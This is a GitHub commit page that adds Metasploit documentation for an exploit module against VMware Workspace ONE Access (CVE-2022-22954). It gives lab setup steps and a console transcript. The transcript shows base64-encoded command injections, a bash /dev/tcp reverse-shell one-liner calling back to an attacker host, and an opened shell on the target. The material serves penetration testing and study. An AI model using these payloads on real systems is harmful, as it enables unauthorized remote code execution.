Skip to content

Commit

Permalink
Add module doc
Browse files Browse the repository at this point in the history
  • Loading branch information
@wvu
wvu committed May 3, 2022
1 parent bf7d3e1 commit 184b1b1
Showing 1 changed file with 82 additions and 0 deletions.
82 changes: 82 additions & 0 deletions ...tation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,82 @@
## Vulnerable Application

### Setup

Follow [Installing and Configuring VMware Workspace ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be exploitable out of the box.

1. Import `identity-manager-21.08.0.1-19010796_OVF10.ova`
1. Boot the VM
1. Hax

[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

## Scenarios

### VMware Workspace ONE Access 21.08.0.1

```
msf6 > use exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > options
Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set rhosts 192.168.0.5
rhosts => 192.168.0.5
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set reverselistenerbindaddress 127.0.0.1
reverselistenerbindaddress => 127.0.0.1
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbose true
verbose => true
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run
[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174'
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})}
[+] The target is vulnerable.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})}
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500
id
uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal)
uname -a
Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux
```

0 comments on commit 184b1b1

Please sign in to comment.